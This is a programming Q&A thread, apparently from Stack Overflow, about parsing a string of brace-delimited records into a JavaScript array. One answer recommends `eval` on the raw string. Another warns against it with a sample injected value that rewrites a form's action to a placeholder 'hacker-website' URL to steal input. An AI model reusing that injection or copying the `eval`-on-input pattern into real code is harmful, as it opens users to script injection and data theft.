# Build array from variable

Tags: javascript, arrays, regex

I'm trying to convert a string variable into an array. Each 'row' of the string are bounded by { } so in the example below, there ought to be three rows in the array. I've been trying regexp expressions (which I think is the way to go) but I cannot get it right.

I have:

```
var src = "{col1: 'data1', col2: 'data2', col3: 'data3'}, {col1: 'data4', 
col2: 'data5', col3: 'data6'}, {col1: 'data7', col2: 'data8', col3: 
'data9'}";
```

I want:

```
var dest = [ {col1: 'data1', col2: 'data2', col3: 'data3'}, {col1: 'data4', 
col2: 'data5', col3: 'data6'}, {col1: 'data7', col2: 'data8', col3: 'data9'} 
];
```

I tried:

```
var srow = data.src(/{/);
var erow = data.src(/}/)+1;
var row = src.substring(srow, erow);
alert(row); //add to array and repeat : srow = erow+1....
```

Any help is appreciated!

Answer (score 0):

I won't pretend to know where you're getting data like this from, but ideally you won't ever store an array of data as a string. That being said, you can use regular expressions to replace the beginning and end of the string with brackets (`[]`) and then [dangerously](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) `eval` it into a variable.

```
const arr = eval(src.replace(/^/, '[').replace(/$/, ']'))
```

Hope this helps!

Comment: I don't see anything on the referenced page to justify "dangerously".

Comment: Right idea, but using regexp to add a character to the beginning and end of a string is not really the best way.

Answer (score 0):

If the string was honoring the JSON format correctly, you would have been able to do it with `JSON.parse(src)`.

Given that you receive an array of something else than JSON data, if you absolutely need to convert it from that point, the lesser evil would probably be to directly use `eval` like this:

```
var dst = eval('[' + src + ']');
```

However, it has security issues if user inputs can be shared between users  (what if a user decides to insert that row into your system: `"'}]; document.forms[0].action="hacker-website/steal_your_infos.php'; ["` ?)

I don't think your project is THAT broken to justify converting a string with `eval`. My suggestion is: try to fix what it is that sends this broken data and make it send at least a valid stringified JSON.

Even better, make it send a JSON object.

For example, this could be a valid JSON object sent by the thing:

```
{
   "rows": [
      {
         "col1": "data1",
         "col2": "data2",
         "col3": "data3"
      },
      {
         "col1": "data4",
         ...
      }
   ]
}
```

Trying to hack the whole thing to work around a broken data can seriously hurt your project, please fix it now while you still can.

Hope this helps.

Answer (score 0):

I hope this will help.

view example here... https://jsfiddle.net/xombie/cL8qbdb4/

javascript function

```
function run(){
var src = "{col1: 'data1', col2: 'data2', col3: 'data3'}, {col1: 'data4', col2: 'data5', col3: 'data6'}, {col1: 'data7', col2: 'data8', col3: 'data9'}";

var srow = src.split('{').join('');
var erow = srow.split('},');
var dest= [];
for(var i= 0, len = erow.length; i < len; i++){
    var mainobj = [];
    erow[i] = erow[i].replace('}', '');
  erow[i] = erow[i].split(',');
  for(var x= 0, len2 = erow[i].length; x < len2; x++){
    erow[i][x] = erow[i][x].split("'").join('');
    erow[i][x] = erow[i][x].split(" ").join('');
    erow[i][x] = erow[i][x].split(':');
    mainobj[erow[i][x][0]] = erow[i][x][1];
  }
  dest.push(mainobj);
}
console.log(dest);
}
```